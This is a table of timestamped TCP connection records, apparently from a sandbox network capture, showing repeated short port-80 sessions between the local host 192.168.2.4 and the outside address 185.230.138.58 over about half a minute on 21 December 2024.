                                                                                                                                        Dec 21, 2024 10:07:39.696242094 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.696310043 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.696362972 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.696455002 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.740199089 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.756086111 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.814424992 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.814585924 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.814779043 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.814857960 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.815021992 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.815172911 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.815201044 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.815234900 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.815283060 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.815329075 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.815413952 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.815481901 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.815634012 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.854584932 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.904344082 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.968101978 CET8049754185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:40.013700008 CET4975480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:40.200128078 CET8049754185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:40.248059034 CET4975480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:40.323895931 CET4975480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:40.324204922 CET4975580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:40.443821907 CET8049754185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:40.443859100 CET8049755185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:40.443921089 CET4975480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:40.444000006 CET4975580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:40.444222927 CET4975580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:40.563868046 CET8049755185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:40.579251051 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:40.581924915 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:40.702553988 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:40.795053959 CET4975580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:40.915674925 CET8049755185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:40.935658932 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:40.997273922 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:41.044965029 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:41.058655977 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:41.061280012 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:41.432450056 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:41.482439995 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:41.700805902 CET8049755185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:41.748068094 CET4975580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:41.940274000 CET8049755185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:41.982471943 CET4975580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:42.068356991 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:42.068680048 CET4975580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:42.068780899 CET4975680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:42.188225031 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:42.188309908 CET8049756185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:42.188343048 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:42.188466072 CET4975680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:42.188704967 CET4975680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:42.188735962 CET8049755185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:42.188792944 CET4975580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:42.308767080 CET8049756185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:42.545149088 CET4975680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:42.664961100 CET8049756185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:43.433625937 CET8049756185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:43.482537985 CET4975680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:43.668401003 CET8049756185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:43.716837883 CET4975680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:43.792030096 CET4975780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:43.911587954 CET8049757185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:43.911703110 CET4975780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:43.911874056 CET4975780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:44.031425953 CET8049757185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:44.263776064 CET4975780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:44.383415937 CET8049757185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:45.159116030 CET8049757185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:45.201291084 CET4975780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:45.396410942 CET8049757185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:45.451317072 CET4975780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:45.509715080 CET4975780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:45.510015011 CET4975880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:45.629607916 CET8049758185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:45.629705906 CET8049757185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:45.629744053 CET4975880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:45.629772902 CET4975780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:45.629961967 CET4975880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:45.749541998 CET8049758185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:45.982625961 CET4975880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:46.102185011 CET8049758185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:46.436309099 CET4975980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:46.436379910 CET4975880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:46.555898905 CET8049759185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:46.556058884 CET4975980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:46.556866884 CET4975980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:46.561652899 CET4976080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:46.596851110 CET8049758185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:46.604352951 CET8049758185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:46.604526043 CET4975880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:46.676394939 CET8049759185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:46.681262016 CET8049760185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:46.681339979 CET4976080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:46.681505919 CET4976080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:46.800964117 CET8049760185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:46.904452085 CET4975980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:47.023991108 CET8049759185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:47.024071932 CET8049759185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:47.029506922 CET4976080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:47.149162054 CET8049760185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:47.799607038 CET8049759185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:47.841996908 CET4975980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:47.926356077 CET8049760185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:47.967009068 CET4976080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:48.036298990 CET8049759185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:48.076289892 CET4975980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:48.163228035 CET8049760185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:48.216950893 CET4976080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:48.283577919 CET4975980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:48.283627987 CET4976080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:48.283931971 CET4976180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:48.403534889 CET8049759185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:48.403553963 CET8049761185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:48.403594971 CET4975980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:48.403670073 CET4976180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:48.403841972 CET4976180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:48.403879881 CET8049760185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:48.403938055 CET4976080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:48.523463964 CET8049761185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:48.748302937 CET4976180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:48.869461060 CET8049761185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:49.650067091 CET8049761185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:49.702754974 CET4976180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:49.884233952 CET8049761185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:49.935703993 CET4976180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:50.016927004 CET4976280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:50.136708975 CET8049762185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:50.136799097 CET4976280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:50.136981010 CET4976280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:50.258059978 CET8049762185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:50.482744932 CET4976280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:50.602447033 CET8049762185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:51.385217905 CET8049762185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:51.435709953 CET4976280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:51.621867895 CET8049762185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:51.670109987 CET4976280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:51.748987913 CET4976280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:51.749336004 CET4976380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:51.868776083 CET8049762185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:51.868860960 CET4976280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:51.868931055 CET8049763185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:51.869015932 CET4976380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:51.869218111 CET4976380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:51.990073919 CET8049763185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:52.216969013 CET4976380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:52.336872101 CET8049763185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:53.045763016 CET4976380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:53.045865059 CET4976480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:53.117249012 CET8049763185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:53.117342949 CET4976380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:53.165345907 CET8049764185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:53.165431023 CET4976480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:53.165584087 CET4976480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:53.165622950 CET8049763185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:53.165770054 CET4976380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:53.167427063 CET4976580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:53.285258055 CET8049764185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:53.286974907 CET8049765185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:53.287054062 CET4976580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:53.287297010 CET4976580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:53.406810999 CET8049765185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:53.513854027 CET4976480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:53.634699106 CET8049764185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:53.635281086 CET8049764185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:53.638837099 CET4976580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:53.761279106 CET8049765185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:54.434003115 CET8049764185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:54.482500076 CET4976480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:54.596649885 CET8049765185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:54.654427052 CET4976580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:54.672300100 CET8049764185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:54.716943026 CET4976480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:54.832571030 CET8049765185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:54.873095989 CET4976580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:54.946266890 CET4976580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:54.946369886 CET4976480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:54.946597099 CET4976680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:55.066083908 CET8049766185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:55.066333055 CET4976680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:55.066431999 CET4976680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:55.066457033 CET8049765185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:55.066519022 CET4976580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:55.066814899 CET8049764185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:55.066883087 CET4976480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:55.186043978 CET8049766185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:55.420157909 CET4976680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:55.539836884 CET8049766185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:56.312868118 CET8049766185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:56.357489109 CET4976680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:56.548470020 CET8049766185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:56.591850996 CET4976680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:56.687400103 CET4976780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:56.807296038 CET8049767185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:56.807356119 CET4976780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:56.807511091 CET4976780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:56.927004099 CET8049767185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:57.154491901 CET4976780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:57.275496006 CET8049767185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:58.051028967 CET8049767185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:58.091875076 CET4976780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:58.284256935 CET8049767185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:58.326245070 CET4976780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:58.401496887 CET4976880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:58.401556969 CET4976780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:58.522665977 CET8049768185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:58.522753000 CET4976880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:58.522933006 CET4976880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:58.523154020 CET8049767185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:58.523211002 CET4976780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:58.642510891 CET8049768185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:58.873334885 CET4976880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:58.993098021 CET8049768185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:59.686436892 CET4976880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:59.686470032 CET4977080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:59.770682096 CET8049768185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:59.770750999 CET4976880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:59.807478905 CET8049770185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:59.807566881 CET4977080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:59.807581902 CET4977180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:59.807694912 CET4977080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:59.807750940 CET8049768185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:59.807800055 CET4976880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:59.927397013 CET8049771185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:59.927484035 CET8049770185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:59.927535057 CET4977180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:59.927690029 CET4977180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:00.047280073 CET8049771185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:00.154539108 CET4977080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:00.274074078 CET8049770185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:00.274210930 CET8049770185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:00.279419899 CET4977180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:00.399107933 CET8049771185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:01.067929983 CET8049770185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:01.123114109 CET4977080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:01.174508095 CET8049771185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:01.216866016 CET4977180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:01.300174952 CET8049770185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:01.341864109 CET4977080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:01.408255100 CET8049771185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:01.451657057 CET4977180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:01.541997910 CET4977080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:01.542329073 CET4977280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:01.542360067 CET4977180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:01.664016008 CET8049772185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:01.664158106 CET4977280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:01.664340019 CET8049770185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:01.664401054 CET4977080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:01.664483070 CET4977280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:01.664930105 CET8049771185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:01.664983988 CET4977180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:01.784761906 CET8049772185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:02.013839006 CET4977280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:02.133460999 CET8049772185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:02.910501003 CET8049772185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:02.951368093 CET4977280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:03.144618034 CET8049772185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:03.185626984 CET4977280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:03.257986069 CET4976680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:03.260900021 CET4977880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:03.380634069 CET8049778185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:03.380747080 CET4977880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:03.380866051 CET4977880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:03.500397921 CET8049778185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:03.732595921 CET4977880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:03.852550983 CET8049778185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:04.628310919 CET8049778185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:04.669987917 CET4977880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:04.860265017 CET8049778185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:04.904388905 CET4977880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:04.980648994 CET4977880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:04.981014967 CET4978480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:05.100795031 CET8049784185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:05.100871086 CET8049778185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:05.100908041 CET4978480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:05.100929976 CET4977880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:05.101130009 CET4978480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:05.222220898 CET8049784185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:05.451370001 CET4978480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:05.571212053 CET8049784185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:06.311587095 CET4978680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:06.311856031 CET4978480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:06.347203970 CET8049784185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:06.347373962 CET4978480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:06.432213068 CET8049786185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:06.432228088 CET8049784185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:06.432291031 CET4978680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:06.432324886 CET4978480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:06.432492018 CET4978680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:06.446624041 CET4978780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:06.551981926 CET8049786185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:06.566355944 CET8049787185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:06.566431999 CET4978780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:06.566540956 CET4978780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:06.686615944 CET8049787185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:06.779613018 CET4978680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:06.899390936 CET8049786185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:06.899416924 CET8049786185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:06.920078993 CET4978780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:07.040698051 CET8049787185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:07.678970098 CET8049786185.230.138.58192.168.2.4
